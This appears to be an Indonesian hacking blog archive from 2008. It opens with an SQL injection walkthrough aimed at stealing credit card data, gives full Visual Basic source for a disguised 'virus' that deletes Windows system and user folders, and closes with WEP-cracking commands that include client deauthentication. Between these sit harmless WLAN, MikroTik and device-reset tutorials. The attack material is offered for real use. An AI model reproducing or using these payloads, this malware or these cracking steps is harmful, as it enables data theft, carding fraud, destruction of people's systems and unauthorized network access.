nah....!! sekarang kita tau.kalau pesan error nya bilang begitu berarti dia pake 'user.id.maka kembali ketikkan ulang di username: 'grup by user.id having 1=1- -
maka otomatis akan muncul pesan error lagi sama seperti di atas cuma ada perubahan pada bagian stelah colomn ='user.username'
naaah..!!kita dapat lagi.maka kita susul lagi dengan mengisikan pada username,sekali ini kita cek password nya.dia pake password ato gak.
ketikkan di username: 'group by user.id, user.username.password,user.privs having 1=1- -
jika memungkin kan tidak terjadi error maka tabel user mamang bener ada password nya.maka kita coba lagi isi di bidang username: 'union select sum(username)from user- -
tau gak?? sum=yang terdapat angka metematis/integer.seperti 1234 sampe 9.jika error berarti username brtype varchar.apalagi tuh varchar bang??varchar=huruf yang tidak memiliki nilai matematis.dari A ampe Z.lah..kalo bener dia pake varchar maka akan muncul pesan error. koq errror terus seeh??karna emang kita khan mencari username+passwrd dari pesan error nah...!!!kita lanjut.sekarang pesan error nya begini:
MICROSOFT OLE DB Provider for ODBC driver error'8004e07'
[MICROSOFT] [ODBC SQL SERVER DRIVER] [SQL SERVER]
The sum or average aggregate operation cannot take a varchar data type as an argument
/process_login.asp,line 35
maka kita isi lagi: 'unio select
pesan error nya kurang lebih berbunyi:
@@version,1,1,1- -
Microsoft OLEDB,PROVIDER FOR ODBC DRIVER ERROR ' 8004E07 ' [MICROSOFT] [ODBC SQL Server Driver] [SQL Server]
syntax error convertingthe nvachar value
' microsoft SQL Server 2000-8.00.194(intelx86)aug 6 2000 00:57:48 Copy right (c)1988-2000 microsoft corporation enterprice edition on windows NT 5.0(build 2195:server pack 2) to 2 column of data type int.
/process_login.asp,line 35
nah....!! selanjut nya atas perintah pesan tadi kita mengkonversi konstanta @@version kedalam bentuk integer
username: 'union select min(username),1,1,1 from user where username> 'a' - -
maka akan muncul error message:
microsoft OLE DB provider for ODBC dRIVER ERROR '8840e07'
[microsoft] [odbc sql server driver] [sql server]syntax error converting the varchar value 'ADMIN' to a column of data type int.
/process_login.asp,line 35
nah....!! ada account admin.maka tugas kita gali lagee...
username: 'union select min(username),1,1,1 from user where username> ' admin ' - -
maka akan muncul pesan error
microsoft OLE DB Provider for ODBC driver error ' 80040e07'
[microsoft] [ODBCSQL SERVER DRIVER] syntax error converting the varchar value ' roger ' to a column of data type int.
/process_login.asp,line 35
oke.....!!sekarang kita dapet username dengan nama : roger sekarang kita cari password nya,untuk pengguna roger :
username= ' union select password,1,1,1from user where username= ' admin ' - - maka akan muncul pesan error.yang berbunyi........misal:
microsoft OLEDB Provider for ODBC driver error '8004e07'
[microsoft] [ODBC SQL SERVER DRIVER] syntax error converting the varchar value ' bryan 200' to a column of data type
/process_login.asp,line 35
DAPAT......!!! KALAU UDAH BEGINI MAU APA LAGI?? TERSERAH LOE DECH...mau ngapain aja loe suka-suka ati kau lah.mau di acak-acak tuch database nya.tapi...jangan lupa.berhubung judul kita kali ini CARDING(PEMBOBOL KARTU KREDIT)Nah...musti kartu kredit pelanggan yang di cari.....
nah...untuk kali ini udah dulu dech....ampe sini aja doeloe.eiiit...tapi masih ada lagi yang harus kamu ketahui.yaitu setelah dapet kartu kredit kira-kira tuch kartu masih valid gak ya???jangan-jangan tuch kartu dah abis masa berlakunya cemen dech jadinya....hehehe.jadi gimana caranya bang??cara menguji validitas kartu kredit bisa dibaca di: lanjutan carding/pembobol kartu kredit.nahh..kalo udah dapet tuh kartu kredit yang asli...jangan coba-coba asal maen beli.sembunyikan identitas doeloe..caranya bang???pokok nya baca aja di judul itu dech....dijamin gak nyessel.
selamat mencoba

2008-07-01T02:03:00.000-07:00

Iseng – Iseng berhadiah…..

Karena kesal dengan proses pengiriman attachment/file ke imel yang dituju memakan waktu yang lama, iseng-iseng saya menjahili aplikasi billing di warnet depan rumah. Setelah diamati, perhitungan billing explorer atau sewa komputer yang dipakai di warnet depan rumah saya berdasarkan jam yang ada pada komputer client, maka saya mencoba memundurkan jam yang ada di pojok bawah. Start menyewa komputer jam 20:41:20 dengan durasi sewa 00:50:44, saya coba memundurkan waktu 5 menit, dan hasilnya, durasi pemakaian berubah menjadi 00:45:44 :) lumayan, hemat 5 menit. Heheeheh... Tapi nggak ding... saya tidak tega mencurangi billingnya, saya kembalikan lagi durasinya seperti semula. :) Daripada dosa :D

Aplikasi Billing ini rupanya "menyerahkan" sepenuhnya perhitungan durasi sewa komputer kepada waktu yang tertera di pojok bawah desktop, bukan jam yang ada di operator, sehingga "kebocoran" aplikasi ini bisa disalahgunakan. Solusinya? hmmm... mungkin aplikasi billing nya bisa diperbaiki dengan cara, pada saat login user, otomatis perhitungan waktu mengambil "referensi" waktu dari server atau komputer operator. Atau mungkin juga, setiap komputer client diberi "pengaman" agar user tidak bisa membuka atau memodifikasi "fasilitas-fasilitas penting" yang akhirnya membuat operator rugi.

Atau ada solusi lain?

Nich...Virus....

2008-06-24T03:53:00.001-07:00

Gregetan…..!!
Jangan disiasiain yach…..!!
Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple gt
Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB
—- more —-
Tutorial Bikin Virus cman 1 mnt
1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…
Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…
4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain
5. Jangan pernah naroh nama lu di nih virus… k?
6. compile deh… slese!
Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.

Apa itu WILAN ??

2008-06-24T03:22:00.000-07:00

WIRELESS LAN……………….??
Wireless LAN adalah :
• Perangkat yang dipakai untuk menyambung jaringan komputer (LAN) dengan menggunakan udara sebagai media komunikasinya
• Frekwensi yang dipakai adalah 2,4GHz atau 5GHz yaitu frekwensi yang tergolong ISM (Industrial, Scientific dan Medical) dan UNII (Unlicensed National Information Infrastructure)
Transmit (Tx) Power
Radio mempunyai daya untuk menyalurkan sinyal pada frekwensi tertentu, daya tersebut disebut Transmit (Tx) Power dan dihitung dari besar enerji yang disalurkan melalui satu lebar frekwensi (bandwidth)
Received (Rx) Sensitivity
Semua radio memiliki point of no return, yaitu keadaan dimana radio menerima sinyal kurang dari Rx Sensitivity yang ditentukan, dan radio tidak mampu melihat data-nya.
Rx Sensitivity yang sebetulnya dari radio akan bervariasi tergantung dari banyak faktor.
Radiated Power
Dalam sistem wireless, antena digunakan untuk meng-konversi gelombang listrik menjadi gelombang elektromagnit. Besar enerji antena dapat memperbesar sinyal terima dan kirim, yang disebut sebagai Antenna Gain yang diukur dalam :
dBi : relatif terhadap isotropic radiator
dBd : relatif terhadap dipole radiator
dimana 0 dBd = 2,15 dBi
Radiated Power
Pengaturan yang dilakukan oleh FCC harus memenuhi ketentuan dari besarnya daya yang keluar dari antena. Daya ini diukur berdasarkan dua cara :
Effective Isotropic Radiated Power (EIRP)
Diukur dalam dBm = daya di input antena [dBm] + relatif antena gain [dBi]
Effective Radiated Power (ERP)
Diukur dalam dBm = daya di input antena [dBm] + relatif antena gain [dBd]
Kehilangan Daya
Pada sistem wireless, ada banyak faktor yang menyebabkan kehilangan kekuatan sinyal, seperti kabel, konektor, penangkal petir dan lainnya yang akan menyebabkan turunnya unjuk kerja dari radio jika dipasang sembarangan
Pada radio yang daya-nya rendah seperti 802.11b, setiap dB adalah sangat berarti, dan harus diingat “3 dB Rule”.
Setiap kenaikan atau kehilangan 3 dB, kita akan mendapatkan dua kali lipat daya atau kehilangan setengahnya .
Kehilangan Daya
-3 dB = 1/2 daya
-6 dB = 1/4 daya
+3 dB = 2x daya
+6 dB = 4x daya

Sumber yang menyebabkan kehilangan daya dalam sistem wireless : free space, kabel, konektor, jumper, hal-hal yang tidak terlihat.
3dB Rule bisa diterapkan secara prak-tis dengan bantuan antenna Access Point dengan standar 802.11b mempunyai penguatan 13dB untuk jarak 300 meter, maka kalau kita menggunakan antena 15dB (total 28dB) rumusannya menjadi :
- 13 + 3 dB – jaraknya menjadi 600 meter
- 16 + 3 dB – jaraknya menjadi 1,2 KM
- 19 + 3 dB – jaraknya menjadi 2,4 KM
- 21 + 3 dB – jaraknya menjadi 4,8 KM
- 24 + 3 dB – jaraknya menjadi 9,6 KM
- 1dB dianggap loss ….
Direct Sequence Spread Spectrum
Dikenal juga sebagai Direct Sequence Code Division Multiple Access (DS-CDMA), DSSS merupakan salah satu cara untuk menyebarkan modulasi sinyal digital di udara.
Rentetan informasi dikirim dengan membagi sekecil mungkin sinyal, lalu ditumpangkan pada kanal frekwensi yang ada di dalam spektrum tertentu.
Direct Sequence Spread Spectrum
Pada saat dipancarkan, data di kombinasi dengan rentetan bit data yang lebih tinggi (disebut chipping code) untuk kemudian datanya dibagi menurut rasio tertentu.
Transmitter dan Receiver harus di sinkronisasi dengan kode acak yang sama.
Chipping code membantu sinyal lebih tahan terhadap interference dan juga memungkinkan data aslinya bisa di perbaiki jika ternyata rusak selama pengiriman.

Direct Sequence Spread Spectrum
Sinyal yang sudah di acak dan digabung dengan sinyal lain, dimana bandwidth-nya adalah 22MHz
Frequency Hopping Spread Spectrum
Dikenal juga sebagai Frequency Hopping Code Division Multiple Access (FH-CDMA), radio FHSS dipancarkan dengan meloncat-loncat diantara frekwensi yang sudah tersedia dan mengikuti satu alogaritma tertentu, baik secara acak atau tertentu.
Transmitter di sinkronisasi dengan Receiver, sehingga tetap berada di frekwensi tengah-nya.
Standar Wireless LAN
– Standar yang dipakai adalah IEEE 802.11x, dimana x adalah sub standar yang terdiri dari :
* 802.11 - 2,4GHz - 2Mbps
* 802.11a - 5GHz - 54Mbps
* 802.11a 2X - 5GHz - 108Mbps
* 802.11b - 2,4GHz - 11Mbps
* 802.11g - 2,4GHz - 22Mbps
* 802.11n - 2,4GHz - 120Mbps
Gregetan…….!!

Lupa.....!!!

2008-06-20T05:27:00.000-07:00

Lupa Password Login Admin Win XP
By : Gregetan
Apabila komputer anda berisi data2x penting. tentunya anda tak ingin orang lain melihat apalagi sampai mengcopy dengan diam2x data anda. oleh karena itu kebanyakan orang akan memberi password login windows pada komputer mereka. Namun bagaimana jika anda lupa password login windows tersebut. untuk itu sebaiknya anda persiapkan mulai sekarang.
- Siapkan sebuah floppy disk atau sebuah USB flash disk.
- Bukalah User Account melalui Control Panel.
- Pilih account administrator anda. Kemudian pilihlah pada Prevent a forgotten password.
- Di jendela yg muncul, pilih drive yg akan dipakai, klik next.
- Isi password administrator anda yang sekarang, klik next
- Tunggu hingga prosesnya selesai
- Di drive akan di hasilkan sebuah file bernama userkey.psw. Jaga file tersebut.
- Di layar login, pilih user name Anda, dan tekan Enter. Maka akan muncul sebuah pop-up bertuliskan Did you forget your password?.
- Klik Use your password reset disk, dan masukkan disk yang berisi password reset anda.
- Masukkan password anda yang baru dan hint-nya, lalu Next.
- Setelah itu. Anda bisa login kembali ke Windows dengan password yang baru saja dibuat.
Trik ini hanya berlaku pada komputer dimana anda membuat password reset, dengan kata lain file userkey.psw yang berada di flash disk anda tidak bisa anda gunakan untuk menembus komputer lain

Mikrotik tutorial....

2008-06-20T04:58:00.000-07:00

MIKROTIK STEP BY STEP

Sekilas Mikrotik
Mikrotik sekarang ini banyak digunakan oleh ISP, provider hotspot, ataupun oleh pemilik warnet. Mikrotik OS menjadikan computer menjadi router network yang handal yang dilengkapi dengan berbagai fitur dan tool, baik untuk jaringan kabel maupun wireless.
Dalam tutorial kali ini penulis menyajikan pembahasan dan petunjuk sederhana dan simple dalam mengkonfigurasi mikrotik untuk keperluan-keperluan tertentu dan umum yang biasa dibutuhkan untuk server/router warnet maupun jaringan lainya, konfirugasi tersebut misalnya, untuk NAT server, Bridging, BW manajemen, dan MRTG.
Versi mikrotik yang penulis gunakan untuk tutorial ini adalah MikroTik routeros 2.9.27
Akses mirotik:
1. via console
Mikrotik router board ataupun PC dapat diakses langsung via console/ shell maupun remote akses menggunakan putty (www.putty.nl)
2. via winbox
Mikrotik bisa juga diakses/remote menggunakan software tool winbox
3. via web
Mikrotik juga dapat diakses via web/port 80 dengan menggunakan browser

Memberi nama Mirotik

[ropix@IATG-SOLO] > system identity print
name: "Mikrotik"
[ropix@IATG-SOLO] > system identity edit
value-name: name

masuk ke editor ketik misal saya ganti dengan nama IATG-SOLO:

IATG-SOLO
C-c quit C-o save&quit C-u undo C-k cut line C-y paste

Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor

Mengganti nama interface:

[ropix@IATG-SOLO] > /interface print
Flags: X - disabled, D - dynamic, R - running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
[ropix@IATG-SOLO] > /interface edit 0
value-name: name

Nilai 0 adalah nilai ether1, jika ingin mengganti ethet2 nilai 0 diganti dengan 1.
masuk ke editor ketik missal saya ganti dengan nama local:

local
C-c quit C-o save&quit C-u undo C-k cut line C-y paste

Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor
Lakukan hal yang sama untuk interface ether 2, sehingga jika dilihat lagi akan muncul seperti ini:
[ropix@IATG-SOLO] > /interface print
Flags: X - disabled, D - dynamic, R - running
# NAME TYPE RX-RATE TX-RATE MTU
0 R local ether 0 0 1500
1 R public ether 0 0 1500

Seting IP Address :

[ropix@IATG-SOLO] > /ip address add
address: 192.168.1.1/24
interface: local
[ropix@IATG-SOLO] > /ip address print
Flags: X - disabled, I - invalid, D - dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.254/24 192.168.0.0 192.168.0.255 local
Masukkan IP addres value pada kolom address beserta netmask, masukkan nama interface yg ingin diberikan ip addressnya.Untuk Interface ke-2 yaitu interface public, caranya sama dengan diatas, sehingga jika dilihat lagi akan menjadi 2 interface:

[ropix@IATG-SOLO] > /ip address print
Flags: X - disabled, I - invalid, D - dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.254/24 192.168.0.0 192.168.0.255 local
1 202.51.192.42/29 202.51.192.40 202.51.192.47 public

Mikrotik Sebagai NAT

Network Address Translation atau yang lebih biasa disebut dengan NAT adalah suatu metode untuk menghubungkan lebih dari satu komputer ke jaringan internet dengan menggunakan satu alamat IP. Banyaknya penggunaan metode ini disebabkan karena ketersediaan alamat IP yang terbatas, kebutuhan akan keamanan (security), dan kemudahan serta fleksibilitas dalam administrasi jaringan.

Saat ini, protokol IP yang banyak digunakan adalah IP version 4 (IPv4). Dengan panjang alamat 4 bytes berarti terdapat 2 pangkat 32 = 4.294.967.296 alamat IP yang tersedia. Jumlah ini secara teoretis adalah jumlah komputer yang dapat langsung koneksi ke internet. Karena keterbatasan inilah sebagian besar ISP (Internet Service Provider) hanya akan mengalokasikan satu alamat untuk satu user dan alamat ini bersifat dinamik, dalam arti alamat IP yang diberikan akan berbeda setiap kali user melakukan koneksi ke internet. Hal ini akan menyulitkan untuk bisnis golongan menengah ke bawah. Di satu sisi mereka membutuhkan banyak komputer yang terkoneksi ke internet, akan tetapi di sisi lain hanya tersedia satu alamat IP yang berarti hanya ada satu komputer yang bisa terkoneksi ke internet. Hal ini bisa diatasi dengan metode NAT. Dengan NAT gateway yang dijalankan di salah satu komputer, satu alamat IP tersebut dapat dishare dengan beberapa komputer yang lain dan mereka bisa melakukan koneksi ke internet secara bersamaan.

Misal kita ingin menyembunyikan jaringan local/LAN 192.168.0.0/24 dibelakang satu IP address 202.51.192.42 yang diberikan oleh ISP, yang kita gunakan adalah fitur Mikrotik source network address translation (masquerading) . Masquerading akan merubah paket-paket data IP address asal dan port dari network 192.168.0.0/24 ke 202.51.192.42 untuk selanjutnya diteruskan ke jaringan internet global.
Untuk menggunakan masquerading, rule source NAT dengan action 'masquerade' harus ditambahkan pada konfigurasi firewall:
[ropix@IATG-SOLO] > /ip firewall nat add chain=srcnat action=masquerade out-interface=public

Mikrotik sebagai Transparent web proxy

Salah satu fungsi proxy adalah untuk menyimpan cache. Apabila sebuah LAN menggunakan proxy untuk berhubungan dengan Internet, maka yang dilakukan oleh browser ketika user mengakses sebuah url web server adalah mengambil request tersebut di proxy server. Sedangkan jika data belum terdapat di proxy server maka proxy mengambilkan langsung dari web server. Kemudian request tersebut disimpan di cache proxy. Selanjutnya jika ada client yang melakukan request ke url yang sama, akan diambilkan dari cache tersebut. Ini akan membuat akses ke Internet lebih cepat.

Bagaimana agar setiap pengguna dipastikan mengakses Internet melalu web proxy yang telah kita aktifkan? Untuk ini kita dapat menerapkan transparent proxy. Dengan transparent proxy, setiap Browser pada komputer yang menggunakan gateway ini secara otomatis melewati proxy.

Mengaktifkan fiture web proxy di mikrotik:
[ropix@IATG-SOLO] > /ip proxy set enabled=yes
[ropix@IATG-SOLO] > /ip web-proxy set
cache-administrator= ropix.fauzi@infoasia.net
[ropix@IATG-SOLO] > /ip web-proxy print

enabled: yes
src-address: 0.0.0.0
port: 3128
hostname: "IATG-SOLO"
transparent-proxy: yes
parent-proxy: 0.0.0.0:0
cache-administrator: "ropix.fauzi@infoasia.net"
max-object-size: 8192KiB
cache-drive: system
max-cache-size: unlimited
max-ram-cache-size: unlimited
status: running
reserved-for-cache: 4733952KiB
reserved-for-ram-cache: 2048KiB

Membuat rule untuk transparent proxy pada firewall NAT, tepatnya ada dibawah rule untuk NAT masquerading:
[ropix@IATG-SOLO] > /ip firewall nat add chain=dstnat in-interface=local src-address=192.168.0.0/24 protocol=tcp dst-port=80 action=redirect to-ports=3128

[ropix@IATG-SOLO] > /ip firewall nat print
Flags: X - disabled, I - invalid, D - dynamic
0 chain=srcnat out-interface=public action=masquerade
1 chain=dstnat in-interface=local src-address=192.168.0.0/24 protocol=tcp dst-port=80 action=redirect to-ports=3128

Pada winbox:
1. Aktifkan web proxy pada menu IP>Proxy>Access>Setting ( check box enable)

2. Setting parameter pada menu IP>Web Proxy>Access Setting>General

3. Membuat rule untuk transparent proxy pada menu IP>Firewall>NAT

Transparent proxy dengan proxy server terpisah/independent
Web Proxy built in MikroTik menurut pengamatan saya kurang begitu bagus dibandingkan dengan proxy squid di linux, squid di linux lebih leluasa untuk dimodifikasi dan diconfigure, misalkan untuk feature delay-pool dan ACL list yang berupa file, belum ada di mikrotik seri 2.9.x.
Biasanya kebanyakan orang lebih suka membuat proxy server sendiri, dengan PC Linux/FreeBSD dan tinggal mengarahkan semua client ke PC tersebut.
Topologi PC proxy tersebut bisa dalam jaringan local ataupun menggunakan ip public.
Konfigurasinya hampir mirip dengan transparent proxy, bedanya adalah pada rule NAT

Dalam contoh diatas 192.168.0.100 adalah IP proxy server port 8080

Mikrotik sebagai bandwidth limiter
Mikrotik juga dapat digunakan untuk bandwidth limiter (queue) . Untuk mengontrol mekanisme alokasi data rate.
Secara umum ada 2 jenis manajemen bandwidth pada mikrotik, yaitu simple queue dan queue tree. Silahkan gunakan salah satu saja.

Tutorial berikutnya semua setting mikrotik menggunakan winbox, karena lebih user friendly dan efisien.

Simple queue:
Misal kita akan membatasi bandwidth client dengan ip 192.168.0.3 yaitu untuk upstream 64kbps dan downstream 128kbps
Setting pada menu Queues>Simple Queues
Queue tree
Klik menu ip>firewall>magle

Buat rule (klik tanda + merah) dengan parameter sbb:
Pada tab General:
Chain=forward,
Src.address=192.168.0.3 (atau ip yg ingin di limit)
Pada tab Action :
Action = mark connection,
New connection mark=client3-con (atau nama dari mark conection yg kita buat)
Klik Apply dan OK

Buat rule lagi dengan parameter sbb:
Pada tab General: Chain=forward,
Connection mark=client3-con (pilih dari dropdown menu)
Pada tab Action:
Action=mark packet,
New pcket Mark=client3 (atau nama packet mark yg kita buat)
Klik Apply dan OK

Klik menu Queues>Queues Tree

Buat rule (klik tanda + merah) dengan parameter sbb:

Pada tab General:
Name=client3-in (misal),
Parent=public (adalah interface yg arah keluar),
Paket Mark=client3 (pilih dari dropdown, sama yg kita buat pada magle),
Queue Type=default,
Priority=8,
Max limit=64k (untuk seting bandwith max download)
Klik aplly dan Ok

Buat rule lagi dengan parameter sbb:
Pada tab General:
Name=client3-up (misal),
Parent=local (adalah interface yg arah kedalam),
Paket Mark=client3 (pilih dari dropdown, sama yg kita buat pada magle),
Queue Type=default,
Priority=8,
Max limit=64k (untuk seting bandwith max upload)
Klik aplly dan Ok

Mikrotik sebagai Bridging

Bridge adalah suatu cara untuk menghubungkan dua segmen network terpisah bersama-sama dalam suatu protokol sendiri. Paket yang diforward berdasarkan alamat ethernet, bukan IP address (seperti halnya router). Karena forwarding paket dilaksanakan pada Layer 2, maka semua protokol dapat melalui sebuah bridge.
Jadi analoginya seperti ini, anda mempunyai sebuah jaringan local 192.168.0.0/24 gateway ke sebuah modem ADSL yg juga sebagai router dengan ip local 192.168.0.254 dan ip public 222.124.21.26.
Anda ingin membuat proxy server dan mikrotik sebagai BW management untuk seluruh client. Nah mau ditaruh dimanakan PC mikrotik tersebut? Diantara hub/switch dan gateway/modem? Bukankah nanti jadinya dia sebagai NAT dan kita harus menambahkan 1 blok io privat lagi yang berbeda dari gateway modem?

Solusinya mikrotik di set sebagai bridging, jadi seolah2 dia hanya menjembatani antar kabel UTP saja. Topologinya sbb:

Internet----------Moderm/router-----------Mikrotik--------Switch/Hub-----Client

Setting bridging menggunakan winbox
1. Menambahkan interface bridge
Klik menu Interface kemudian klik tanda + warna merah untuk menambahkan interface, pilih Bridge

2. menambahkan interface ether local dan public pada interface
Klik menu IP>Bridge>Ports , kemudian klik tanda + untuk menambahkan rule baru:
Buat 2 rules, untuk interface local dan public.

3. Memberi IP address untuk interface bridge
Klik menu IP kemudian klik tanda + untuk menambahkan IP suatu interface, missal 192.168.0.100, pilih interface bridge1 (atau nama interface bridge yang kita buat tadi)

Dengan memberikan IP Address pada interface bridge, maka mikrotik dapat di remote baik dari jaringan yg terhubung ke interface local ataupun public.

Mikrotik sebagai MRTG / Graphing
Graphing adalah tool pada mokrotik yang difungsikan untuk memantau perubahan parameter-parameter pada setiap waktu. Perubahan perubahan itu berupa grafik uptodate dan dapat diakses menggunakan browser.
Graphing dapat menampilkan informasi berupa:
* Resource usage (CPU, Memory and Disk usage)
* Traffic yang melewati interfaces
* Traffic yang melewati simple queues

Mengaktifkan fungsi graping
Klik menu Tool >Graphing>Resource Rules
Adalah mengaktifkan graphing untuk resource usage Mikrotik. Sedangkana allow address adalah IP mana saja yang boleh mengakses grafik tersebu,. 0.0.0.0/0 untuk semua ip address.

Klik menu Tool>Graphing>Interface Rules
Adalah mengaktifkan graphing untuk monitoring traffic yang melewati interface, silahkan pilih interface yg mana yang ingin dipantau, atau pilih “all” untuk semua.

Graphing terdiri atas dua bagian, pertama mengumpulkan informasi/ data yang kedua menampilkanya dalam format web. Untuk mengakses graphics, ketik URL dengan format http://[Router_IP_address]/graphs/ dan pilih dari menu-menu yang ada, grafik mana yang ingin ditampilkan.
Contoh hasil grafik untuk traffic interface public:

Demikian, tutorial yang sedikit penulis sampaikan untuk sekedar membagi ilmu atau menyederhanakan untuk memudahkan pemahaman dari tutorial yang sudah tersedia di situs resmi mikrotik.

By: agoyarp@yahoo.com

Cara reset Senao..

2008-06-20T04:50:00.001-07:00

Reset Senao EOC/NOC 3220 EXT 3220+
By ; Gregetan
Di beberapa tempat yang sempat saya kerjakan koneksi wireless point to point maupun point to multipoint, saya lebih banyak menggunakan perangkat senao, dengan pertimbangan daya pancar yang kuat, dan harga yang “murah” dibandingkan dengan perangkat semacam SmartBridge atau Motorola (tapi tentu saja kelasnya masih diatas Senao). Namun jika cukup dengan Senao mengapa harus beli yang mahal ?

Perangkat Senao yang udah terpasang meski kasusnya hanya di satu tempat, kadang butuh di reset karena radionya macet (bug?). Proses reset juga gak bisa dilakukan lewat WEB/GUI karena gak bisa diakses dari komputer lain, jadi terpaksa deh di reset secara hardware. Tapi tunggu dulu ternyata di perangkat tersebut gak ada tombol reset seperti yang biasa dijumpai pada kebanyakan perangkat wireless indoor. Setelah googling .. ternyata harus menggunakan kabel serial RS232 (null modem).
Yang perlu disiapkan adalah kabel serial RS232 9 pin (DB9) dengan konektor female dikedua ujungnya. Meski biasanya bisa ditemukan di toko-toko komputer, biasanya yang ada bukan kabel null modem, melainkan kabel serial biasa dengan konektor F/M (Satu Female dan di ujung lainnya menggunakan konektor Male). Jika Anda tidak bisa menemukan kabel null modem, diakali aja… Gunakan 2 buah kabel serial tersebut, kemudian dipotong lalu sambung kembali sehinggga membentuk konektor Female dikedua sisinya. Yang perlu diperhatikan adalah hubungan antar pin dibuat sesuai dengan hubungan untuk kabel null modem seperti berikut :

Keterangan lengkap mengenai Null Modem ini bisa di baca di sini
Setelah kabel Null Modem siap, selanjutnya ikuti saja langkah-langkah berikut :
Buka terlebih dahulu penutup konektor serial pada radio senao yang terletak dibagian bawah dekat port RJ 45.

1. Hubungkan kabel serial ke port com pada komputer/laptop.
2. Jalankan aplikasi Hyperterminal (ada dibagian accessories-communication). Klik Start kemudian pilih Programs -> Accessories -> Communications -> HyperTerminal.
3. Berikan nama koneksi apa saja, misalnya Senao 3220. Kemudian pilih koneksi COM1 (atau COM2 tergantung port di komputer).
4. Setting HyperTerminal baudrate “38400″, data bits “8″, parity “none”, stop bits “1″, flow control “None”. Kemudian tekan “OK”.
5. Matikan power pada POE selama kurang lebih 5 detik kemudian On-kan kembali.
6. Tunggu sampai prompt # muncul pada layar HyperTerminal.
7. Ketik “flash reset”, Tekan enter.
8. Ketik “reboot”, tekan enter. Perangkat Senao akan reboot dan semua setting akan dikembalikan seperti semula.
9. Jika tidak terdapat kerusakan, Anda bisa mengakses kembali melalui WEB dengan alamat IP default : 192.168.1.1 selesai deh…!!

Menembus pertahanan WEP keys

2008-06-20T04:46:00.000-07:00

Menembus Pertahanan WEP Keys:
1. Jalankan BackTrack.
2. Reset driver wireless. Ketikkan:
#airmon-ng -> cek interface ath yang aktif
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila ath1 aktif
#airmon-ng start wifi0
3. Buka 3 buah console.
4. Console 1, ketikkan:
#airodump-ng ath0 -> scanning hotspot yang aktif.
#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0
Keterangan:
Proses ini untuk mengcapture informasi dapat membantu dalam menembus WE
P Key.
--bssid -> MAC-Address dari AP yang akan di crack
-w target -> hasil capture ini akan disimpan di file yang namanya target
5. Console 2, ketikkan:
Untuk membantu menciptakan pengumpulan paket data
#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0 Keterangan:
-b -> MAC-Address dari AP.
-h -> MAC-Address dari client yang aktif terhubung ke AP.
6. Console 3, ketikkan:
Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.
#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0
Keterangan:
-c -> MAC-Address dari Client
-a -> MAC-Address dari AP
7. Setelah terkumpul paket data yang cukup, dilakukan cracking:
#aircrack-ng target*.cap
Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan
By ; Gregetan